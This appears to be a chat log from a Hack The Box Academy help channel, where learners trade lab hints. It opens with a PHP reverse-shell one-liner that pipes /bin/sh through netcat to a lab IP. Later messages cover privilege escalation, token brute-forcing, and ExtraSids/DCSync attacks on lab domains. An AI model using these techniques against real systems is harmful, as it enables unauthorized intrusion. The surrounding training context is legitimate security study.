hey, is this a valid code for the nibbles section in the getting started section? <?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 9443 >/tmp/f"); ?>
i downloaded the file
What section?
I know one of the sections uses a public ip and port
linux and windows fundamentals, I couldnt RDP or SSH
Then it's likely you need to start the vpn
i dont think that matters much, its just that the php doesnt seem okay
atleast when i curl it it prints nothing
sudo openvpn /path/to/academy-regular.ovpn
Replace 10.10.14.2 with your tun0 ip
Also do you have the netcat listener running when you curl it?
It should hang if it's done properly
yes
And your listener will have a connection
the curl ends and then nothing happens
is it okay if i have openvpn on the app?
and not on the machine?
like this
You should be running the vm in your Linux vm
okok
u mean the vpn?
nope
thank you so much!
for rev shells you need the vpn and netcat listener to be running in the same place
having vpn on host and you working in vm will only work for you connecting to things
not having them connect back to you (which is what the rev shell tries to do)
Yup
i think so
how would you do that? sudo openvpn /path/to/academy-regular.ovpn & like so?
tbh i just run it in a different tab
fair enough
Yeah, I wouldn't recommend backgrounding it though
i wanted to make a .zshrc file with that
In the event that you need to verify the connection works
particularly since i learnt about tmux i dont really use regular backgrounding anymore :p
okok, thats a good call
Meh it's not worth, because in the event you need to swap the vpn region you'd need to kill and restart the vpn with the new config
i have a few issues with tmux, its weird
u cant scroll up if u divide the screen
I dont use tmux
i wanst replying to you, sorry, it was a mistake xD
I just use the basic gnome terminal
.
i never got mouse scrolling to work but you can do [ to enter copy mode and then up/down arrows to scroll
btw, do you guys also have a sort of lag when using the arrow keys in the terminal in your vm? not the browser one
it did take me a while to get used to but now i cant believe how long i went without it
Nope
i have this issue and i have no clue why, i feel like i allocated enough cores and RAM
what do you use to switch between terminals
I just use ctrl-tab
I think ctrl-shift-t to create a new tab
Alt tab
I take advantage of the "workspaces" thing having my openvpn running in one workspace screen and use the other to do stuff, so I don't accidentally close it
ah
what host os/hypervisor?
tmux is useful when you have many terminals open, I usually have 11 open at any given time and it's easy to switch and manage them
though the default keybinds suck
Windows 11
its not all that hard, its just annoying to hit the prefix [ctrl + B ]
I just don't like reteaching myself muscle memory
if you are using virtualbox you need to make sure hyper-v and a bunch of other windows services (eg memory core isolation) that use hyper-v behind the scenes are disabled
possibly (likely) that is true for vmware etc too or basically anything except hyper v itself
Hey! I need some help on the "Introduction to Digital Forensics" module. I am on the Skills Assessment and I am only missing one answer. I am pretty sure it is correct, but the answer is still wrong
To clarify, it is this question: Determine the registry key used for persistence and enter it as your answer.
Edit: Nevermind, I was being super dumb (although my initial answer seems to be okay too 🤔 )
I'm mostly requesting someone who has done the module for a check in DMs
How do I set up VPN on workspaces?
download the .ovpn file from HTB into your VM, then run sudo openvpn {path to the file}
btw, is the reverse shell supposed to be super slow?
it shouldn't be that slow
sometimes it responds super fast
other times it just hangs
you might need to change vpn regions or (if you're not already) use the tcp vpn
how do i do that?
on the page; there should be a section for the vpn that'll have a dropdown menu for the vpn
and 2 buttons, one for udp and one for tcp
Still didn't work. Can I dm you?
Footprinting IMAP/POP3 can I get a nudge in the right direction please
Connecting to the server gave me a email address but its not the right one. I found an article on imap commands but none of them are giving me what I need
hello, i think i found the server name of the host but it doesn't work: https://academy.hackthebox.com/module/144/section/1311
for imap commands, don't forget to use A1 Login password and then make your move
I logged in and the commands work I just dont know which command to use to get what I need
Heyo having some issues with the Broke Auth - Predictable Reset Token module, specifically question 1.
did you select an inbox?
Found that too but still confused. I think Im starting to put the pieces together though
I am grabbing the date from the user response and converting to epoch. Multiplying by 1000 to get milliseconds then hitting every millisecond in a 3 second window but still no dice. Any help would be appreciated.
process: list the inboxes, select a mailbox with content, display first the mail object then the content, but there's a command that lets you do both. I'll leave you to look for it.
sorry not yet done
anyone for my problem ?
Here is a screenshot of my code running! JK I cannot get a photo but here is a snippet "Token Request Time~1706174414000 Token:abe293eeae659a328159c7d712057f52 String:htbadmin1706174412382 Req Status:<Response [200]>"
Here is some additional information
Script Output
Token Req Status: <Response [200]>
Request Date: Thu, 25 Jan 2024 02:43:44 GMT
Dt Object: 2024-01-25 02:43:44
Time Stamp Request Tranlated: 1706175824000
System Time: 1706150624000
Sample Code of the Time Conversion
import requests
from datetime import datetime
from time import time

url = "http://TARGET_IP/reset.php"  # placeholder, the real reset URL is not in this thread
data = {"submit": "htbuser"}
date = requests.post(url, data)
# %Z accepts "GMT" but the parsed datetime is naive (no tzinfo),
# so timestamp() below treats it as local time, not UTC
dt_object = datetime.strptime(str(date.headers["Date"]), "%a, %d %b %Y %H:%M:%S %Z")
print("Token Req Status:", date)
print("Request Date:", str(date.headers["Date"]))
print("Dt Object:", dt_object)
print("Time Stamp Request Tranlated:", int(dt_object.timestamp()) * 1000)
print("System Time:", int(time()) * 1000)
exit()
There may be difference between FQDN, domain name , server name ?
Hi bro, I had the same problem, did you solve it?
Hi i solve it thanks
so i shelled into the place.. confused what i do next
Lol when I ask google to epoch time it says something different but when I use that value it doesnt work. L8r
yo vnk
Module : SQLMap Essential : Running SQLMap on an HTTP Request (https://academy.hackthebox.com/module/58/section/517)
Even though I did find the flag using sqlmap, can I dm someone for help? I want to exploit it manually.
Yup @idle nebula ?
pwnbox ? I think you get 1 free spawn/day
oh sweet preciate it
sorry i cant really help u with exploiting this room manually
i still dont know the basic fundamental commands
like how to use nmap or gobuster
Its fine that was for other members
When I started I was not intermediate
I see
This is resolved*
wish i could help u out man
Anyone know how to escalate privilege to root after I gain a foothold on a server ?
I was told to use the shell command but I’m stuck now
because that's not the host
so you're on
you can either transfer over linPeas
OR run sudo -l
:)
It says sudo -1 is an invalid option
that's an L
Hey marcie ☺️ Yes, I know I understood it after 🫣
not a 1
i remember this from somewhere, but what do i do with the info
well you'll see you can run something with sudo; use gtfobins to see how to take advantage of it
I ran it… just went blank
Privilege escalation “ALL=(ALL) NOPASSWD: /usr/bin/php”
it's really that simple, a couple lines
if you don't close the quotes then it's likely waiting for you to close the quotes
screenshot your terminal
bc you're likely misreading or misunderstanding something
Wait
Vim or Nano ?
1 sec and then I will
personal preference
I like your mindset, you're a rational human
¯\_(ツ)_/¯
i mean it's as shrimple as that
people like to use nano, and people like to use vim; and this isn't really the place to have that discussion/argument
So @fathom pendant you in the industry ?
nope
Just a hobby for you?
yep
this isn't the place for this conversation, this isn't a gen chat - read #welcome
hi, have u solved this? facing same issue, already renewed like bunny said but still not working
what does your CMD= line look like
There was statement in modules I remember along the line ......finding out they are a nano user😅 😂
what is my issue?
should I be running this script from a file on my computer other than my console?
hi, how did u solve this?
what step the module doesn't show
it should be in the meterpreter session
and I just did it and it works fine on mine
ah ik what happened
you copied from the medium post which has the weird quotes
so it copied it weirdly
"/bin/sh"
look at how the quotes curve instead of being straight on the first one after your cmd=
Here is what I said: first use PowerView to identify a Domain Admin you want to target with the PrintSpool attack
Dc01 right ?
I would think so..sorry, it has been a few months since I took that module
meterpreter says sudo cannot be used as a command
i can do it in the shell though
The module doesn't show you which domain admin to target, so I had to first use PowerView to find the Domain Admin
yes you do it from the shell; which is the meterpreter session
try typing out CMD="/bin/sh" instead of copy/pasting
ok thanks
ok I did
nah this shell is dumb
Whoooop thanks Marcie
whenever you run a command that's meant to escalate your privs, always check whoami
thanks solved
You're welcome! Congrats!
also if you upgrade your shell with python3
python3 -c "import pty; pty.spawn('/bin/bash');" you'd get the familiar terminal line btw
Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an SPL search against all 4624 events the account name that made the most login attempts within a span of 10 minutes. Enter it as your answer.
Stuck so long on the Introduction To Splunk & SPL
what I have used
||EventCode=4624 | stats range(_time, 0, 10m)||
yea that question is super weird, try to instead find the accounts where between the first and last login event less than 10m have passed. And then take the one with the most log in attempts. The account in question only logged in to any machines in a 10m time window and never before and never again after
linux PrivEsc module - Environment Enumeration
flag not working?
made sure no spaces before or after
you probably found a flag for the later questions, what's the first and last letter
S - d
yeah wrong flag
lmao
next question asks for python version and the one after it spawns new target
and ask for cred
lol the flag you found is way further down the module
the flag you want should be pretty simple
||i used sudo baron samedit to become root||
I know, but that's got nothing to do with that section lol
the section is all about escalation, idk why it wants info gathering
part of escalation is practicing the file transfer module to get linpeas and let it do the job
and that's why you're overlooking the simple things :)
meh linpeas gives too much information and most of it is useless
honestly linpeas needs automation that reads linpeas
facts
autopwn
which is something you can enable in linpeas iirc
it's disabled so people can run it on OSCP boxes 
what!
ye linPeas has an autopwn function if i'm remembering right
unless they removed it completely
raaa the windows privesc takes 10 working days to get whoami printed out
this module is good, but so slow its insane
Guys, are the CBBH materials enough to pass the exam?
Or I need to practice on PortSwigger for example
do i need to priv esc?
i searched everywhere with root
Everything you need is included in the path
I am just wondering about constructing a complicated payloads, AFAIK, in PortSwigger for example
the XSS payloads could be too complicated, and in CBBH it's too naive like simple closing tag with script tag, so do we have such complicated payloads in the exam? or just like the path and it's focus on the methodology?
i did
oh wait it's this one
yeah search for a pattern that matches the flag format in every file
regex
Done for today I was stuck in sqlmap module for sometime then figured out that these targets have time limit of 90 mins. 
hi can someone help me create infectious file in setoolkit for a usb drive i tried it but when i launched metasploit and ran it , it gave me error.
no; this is in no way related to htb academy
Can anyone help me with this module: https://academy.hackthebox.com/module/244/section/2708, I don’t know why, I put the load in the corresponding location and then access it doesn’t work, maybe I'm using sed incorrectly, if anyone can help, it would be greatly appreciated
Attacking Domain Trust from Linux section is not working for the first command
Okay, so I got the password for the lab right, now the command won't work for the user bross for the question in the end of the lab
??????? Any help in this thread would be great
Also tried this
the window should start from 1 sec before till 1 sec after, and make sure you have accounted for the timezone
This is the question that I am having issues with
None of the commands are working for that username
why not just dump everything
I don't understand what they mean by the extrasids attack, that was from the windows section?!?!
What do you mean dump everything?
yes, it's the same attack, you're just doing it from linux
don't target a single user, dump every user with secretsdump, you need to get the krbtgt hash from the child domain in order to attack the parent domain
hey all having trouble with the footprinting medium box i have the password, or what i assume is the password from the database but im having trouble getting HTB to accept the answer you just put the password correct? you dont need the user at all for it to accept the answer
nevermind reloaded HTB and it accepted the answer the way i had it
So just repeat the same method in the previous module once I get a shell from the psexec command?
I got the shell
I'm not following what you're saying. I already have the krbtgt hash from the module content.
if you have already done the attack then just get bross's hash
the user is in the parent domain, not the child domain
what is the parent domain and what is the child domain?
sorry guys for asking but im noob af, anyone knows why if i copy the root id_rsa private key on my machine to login ssh with it its denied?
you need to set the right permissions
600
Time zone of the original token reply? I've done that. It's in gmt. I just kept it gmt. Spanned 5 seconds back and forward, nothing. The code shows my epoch translation is clearly wrong. Any advice on that? Whose time zone? Mine or the server's?
I'm in LOGISTICS.INLANEFREIGHT.LOCAL, is that one of the ones you're talking about?
also it needs the ----BEGIN and ----END strings
those are also part of the SSH key
it has, prolly its some error pasting?
maybe
okay tyy
the server's timezone, should be utc
what module and section are you working on?
then it's likely copy/pasted wrong
So is my system time converting the reply to gmt?
yes, if you're using datetime it will convert to your current timezone
on the target system do md5sum <id_rsa> then on your system do the same; if there's a difference - then it's copied wrong
okay tyy
note remove the brackets
i would also advise to read the error to be sure what the issue is
Idk it does say gmt in caido proxy too, plus I’m not gmt I’m in mst
I’ll try utc conversion when I’m off shift thanks
its the same hash, the error is just Permission denied
gmt is the same as utc so just make sure it's converted to that
"permission denied" usually comes from one of two things either > you didn't specify the port or you didn't specify the user
oh, prolly the port, in the web its not shown so i didnt use it
i don't recall if this section uses a public ip:port or not
There is no C:\Tools folder once I do the psexec.py command to get a shell
How am I supposed to execute the ExtraSids attack?
btw you didn't specify the section, just the module name
oh sorry, prives
All I get is the flag in the ExtraSids folder, I actually just need the hash for bross
and you copied the root id_rsa yeah?
yup
Wait so if they are the same why didn't it work??? I know my conversion is off because I asked Google the epoch time for the time string in this thread. Which was gmt, so if they are the same and I spanned before and after shouldn't that have worked?
the one found in /root/?
yup, /root/.ssh/id_rsa
I don't even see bross
okay thaanks for ur time ;D
tip: how did you ssh as user1 the first time ;D
What are they asking for?!?!
lemme see
you had to specify the port
marcie can you help with this, I'm gonna hang myself
ye i did
i haven't completed this module
ssh defaults to port 22 if you don't specify
okay then
it doesn't magically know what port is running ssh
ahhaha touche
they're asking for a domain user, dcsync with your extrasid attack ticket
Anyone around to give me a hint on the File Upload module assesment?
So far I managed to read the source code of the app and locate the upload directory with some fuzzing, but I'm unable to upload a file that I can execute. Tried double extension with null bytes and tampering the image extension through the file name length so far
it's the same with ANY service you interact with, if you don't specify port - it's assuming default
okay
are you converting the timestamp returned by the target, and how are you converting it
There's no mimikatz on the machine I get a shell for
I also tried the raisechild.py
http - 80, https - 443, RDP - 3389, ssh 22: just a handful of default ports
the footprinting module goes over more of them
But it only gives me the administrator and krbtgt
Please view the whole thread, the code is in there. Grabbed it. Here is some additional information
Script Output
Token Req Status: <Response [200]>
Request Date: Thu, 25 Jan 2024 02:43:44 GMT
Dt Object: 2024-01-25 02:43:44
Time Stamp Request Tranlated: 1706175824000
System Time: 1706150624000
Sample Code of the Time Conversion
import requests
from datetime import datetime
from time import time

url = "http://TARGET_IP/reset.php"  # placeholder, the real reset URL is not in this thread
data = {"submit": "htbuser"}
date = requests.post(url, data)
# %Z accepts "GMT" but the parsed datetime is naive (no tzinfo),
# so timestamp() below treats it as local time, not UTC
dt_object = datetime.strptime(str(date.headers["Date"]), "%a, %d %b %Y %H:%M:%S %Z")
print("Token Req Status:", date)
print("Request Date:", str(date.headers["Date"]))
print("Dt Object:", dt_object)
print("Time Stamp Request Tranlated:", int(dt_object.timestamp()) * 1000)
print("System Time:", int(time()) * 1000)
exit()
use the administrator's hash to dcsync
dcsync how?
I don't have mimikatz
I'm in linux and the shell I get doesn't have the tools folder
dude.
okay now its done thank u Marciee ;D
dcsync .5